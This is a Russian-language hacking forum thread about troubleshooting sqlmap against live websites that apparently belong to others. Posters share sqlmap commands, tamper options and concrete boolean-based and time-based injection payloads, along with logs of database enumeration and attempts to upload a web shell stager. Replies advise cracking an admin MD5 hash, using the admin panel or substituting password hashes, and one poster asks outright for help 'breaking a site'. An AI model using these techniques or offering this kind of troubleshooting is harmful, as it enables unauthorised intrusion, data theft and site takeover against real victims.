Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    79
    Likes Received:
    8
    Reputations:
    0
    [11:03:22] [INFO] fetching tables for database: 'information_schema'
    [11:03:22] [INFO] fetching number of tables for database 'information_schema'
    [11:03:22] [INFO] retrieved:
    [11:03:22] [WARNING] unable to retrieve the number of tables for database 'information_schema'
    [11:03:22] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] y
    [11:03:24] [INFO] checking table existence using items from 'C:\sql\txt\common-tables.txt'
    [11:03:24] [INFO] adding words used on web page to the check list
    [11:03:24] [INFO] starting 10 threads

    [11:06:07] [WARNING] no table(s) found
    No tables found
    [11:06:07] [WARNING] HTTP error codes detected during run:
    403 (Forbidden) - 2948 times

    Питаюсь достать инфу и в итоге ничего. спасибо жду вашей help
     
  2. PoliGroS

    PoliGroS Member

    Joined:
    29 Mar 2012
    Messages:
    79
    Likes Received:
    8
    Reputations:
    0
  3. Qiezo

    Qiezo New Member

    Joined:
    16 Sep 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Приветствую, нужна ваша помощь!
    Команды:
    1. Sqlmap.py -r "txt" --dbs
    Пытаясь найти базу выдает вот это:
    Code:
    [16:30:03] [CRITICAL] all tested parameters appear to be not injectable. Try to
    increase '--level'/'--risk' values to perform more tests. As heuristic test turn
    ed out positive you are strongly advised to continue on with the tests. Please,
    consider usage of tampering scripts as your target might filter the queries. Als
    o, you can try to rerun by providing a valid value for option '--string' as perh
    aps the string you have chosen does not match exclusively True responses. If you
    suspect that there is some kind of protection mechanism involved (e.g. WAF) may
    be you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

    2. Sqlmap.py -r "txt" -v 3 --tamper="space2comment" --random-agent --no-cast --time-sec=10
    после нее вот это:
    Code:
    [16:12:56] [CRITICAL] all tested parameters appear to be not injectable. Try to
    increase '--level'/'--risk' values to perform more tests. As heuristic test turn
    ed out positive you are strongly advised to continue on with the tests. Please,
    consider usage of tampering scripts as your target might filter the queries. Als
    o, you can try to rerun by providing either a valid value for option '--string'
    (or '--regexp')
    3. Sqlmap.py -r "txt" --stringer --regexp
    После нее возникает снова крит "--tramp space2comment".
    и так по кругу... В чем ошибка и как это все сделать правильно, заранее спасибо!
     
    #223 Qiezo, 16 Sep 2016
    Last edited: 16 Sep 2016
  4. masterdolicjakov

    masterdolicjakov New Member

    Joined:
    17 Sep 2016
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Привет!
    Ув. форумчане, помогите пожалуйста!
    Можно ли каким-то образом залить шелл?
    [​IMG]
     
  5. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    --is-dba
     
  6. masterdolicjakov

    masterdolicjakov New Member

    Joined:
    17 Sep 2016
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Привет!
    Нет, к сожалению не под админом.
    current user is DBA: False
     
  7. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    ищи админку значит,пробуй через нее залиться
     
  8. masterdolicjakov

    masterdolicjakov New Member

    Joined:
    17 Sep 2016
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Админку нашел.
    site.com/admin
    Есть логин из базы и пасс в md5
    В теме попросил расшифровать пасс.
    А так больше нету вариантов?
    Да, и спасибо что отвечаете!
     
  9. powerOfthemind

    powerOfthemind New Member

    Joined:
    31 Jul 2015
    Messages:
    41
    Likes Received:
    4
    Reputations:
    1
    Как выбрать нужный playload.?
    Parameter: m_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: page=subscr_add&m_id=-1933' OR 3776=3776 AND 'dQUO'='dQUO

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: page=subscr_add&m_id=113' AND SLEEP(5) AND 'ZJRH'='ZJRH

    Например нужно по 1му playloadу крутить т.к будет в разы быстрее, но по умолчанию выбирает 2й
     
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    Code:
    ~/sqlmapproject-sqlmap$ python sqlmap.py --help | grep tech
        techniques
        --technique=TECH    SQL injection techniques to use (default "BEUSTQ")
    
    --technique=B
     
    _________________________
  11. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    Error based, в current db могу попасть в остальные нет.Есть варианты?

    web application technology: ASP.NET, Microsoft IIS 8.5, ASP
    back-end DBMS: Microsoft SQL Server 2012
    [18:21:54] [INFO] fetching tables for database: Sam
    [18:21:54] [WARNING] the SQL query provided does not return any output
    [18:21:54] [WARNING] in case of continuous data retrieval problems you are advis
    ed to try a switch '--no-cast' or switch '--hex'
    [18:21:55] [WARNING] the SQL query provided does not return any output
    [18:21:55] [INFO] fetching number of tables for database 'Sam'
    [18:21:55] [WARNING] multi-threading is considered unsafe in time-based data ret
    rieval. Going to switch it off automatically
    [18:21:55] [WARNING] (case) time-based comparison requires larger statistical mo
    del, please wait.............................. (done)
    [18:22:07] [WARNING] it is very important to not stress the network adapter duri
    ng usage of time-based payloads to prevent potential disruptions
    do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
    '--time-sec')? [Y/n] y

    [18:22:10] [INFO] resumed: 0
    [18:22:10] [CRITICAL] unable to retrieve the tables for any database
    [18:22:10] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 2 times
     
  12. Donyan

    Donyan New Member

    Joined:
    7 Apr 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    [​IMG]

    current user is DBA: True

    web server operating system: Linux Ubuntu
    web application technology: PHP 5.3.10
    back-end DBMS: MySQL >= 5.0.12
    database management system users privileges:
    [*] %root% (administrator) [28]

    Помогите поломать сайтец ) Выполнить SQL не удается, ид юзера слит из таблицы (бд и таблица существуют)
     
  13. zagruzkaaa

    zagruzkaaa New Member

    Joined:
    7 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    можно ли сделать, чтобы если выходит несколько сообщений CRITICAL или после нескольких обрывов соединение прекратилось сканирование сайта?
     
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Ищите пути, заливайте шел, или подставляйте хеш пароля в соответствующие место, прав должно хватать.

    может сервер падает, надо меньше потоков, больше задержки, или быть может система защиты на спец знаки, операторы.
     
  15. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    Пытаюсь залить шелл.Права на запись true
    [13:46:34] [WARNING] unable to automatically parse any web server path
    [13:46:34] [INFO] trying to upload the file stager on '/home/ste/public_htm
    l/admin-ste/' via LIMIT 'LINES TERMINATED BY' method
    [13:46:37] [WARNING] unable to upload the file stager on '/home/ste/public_
    html/admin-ste/'
    [13:46:37] [INFO] trying to upload the file stager on '/windows-tools/active-dir
    ectory-manager/' via LIMIT 'LINES TERMINATED BY' method
    [13:46:39] [WARNING] unable to upload the file stager on '/windows-tools/active-
    directory-manager/'
    [13:46:39] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 8 times
     
  16. Donyan

    Donyan New Member

    Joined:
    7 Apr 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Мап ясно дает понять,
    [WARNING] execution of custom SQL queries is only available when stacked queries are supported.
    Можно с этим как-то бороться? Если time-based blind ?
     
  17. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    А что не так-то? с чем бороться?
     
  18. zagruzkaaa

    zagruzkaaa New Member

    Joined:
    7 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    возник следующий вопрос:

    бывает что на каком-то тесте зависает очень надолго. как-то можно задать таймаут на тест?
    например сегодня зависло на
    [INFO] testing 'MySQL inline queries'
     
    #238 zagruzkaaa, 24 Sep 2016
    Last edited: 24 Sep 2016
  19. Donyan

    Donyan New Member

    Joined:
    7 Apr 2016
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Ну запросы UPDATE, DELETE, и т.п не кушает...
     
  20. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    НУ попробуйте команду в кавычках писать

    скл-квери="comm 'parm' "